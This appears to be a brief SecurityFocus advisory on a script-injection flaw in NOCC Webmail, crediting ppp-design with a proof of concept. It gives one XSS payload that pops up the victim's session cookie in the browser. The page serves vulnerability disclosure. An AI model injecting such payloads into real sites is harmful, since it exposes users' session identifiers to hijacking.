NOCC Webmail Script Injection Vulnerability

The following proof of concept script was provided by ppp-design:

<script>alert(document.cookie)</script>

This will show the victim's session id.


 

Privacy Statement
Copyright 2010, SecurityFocus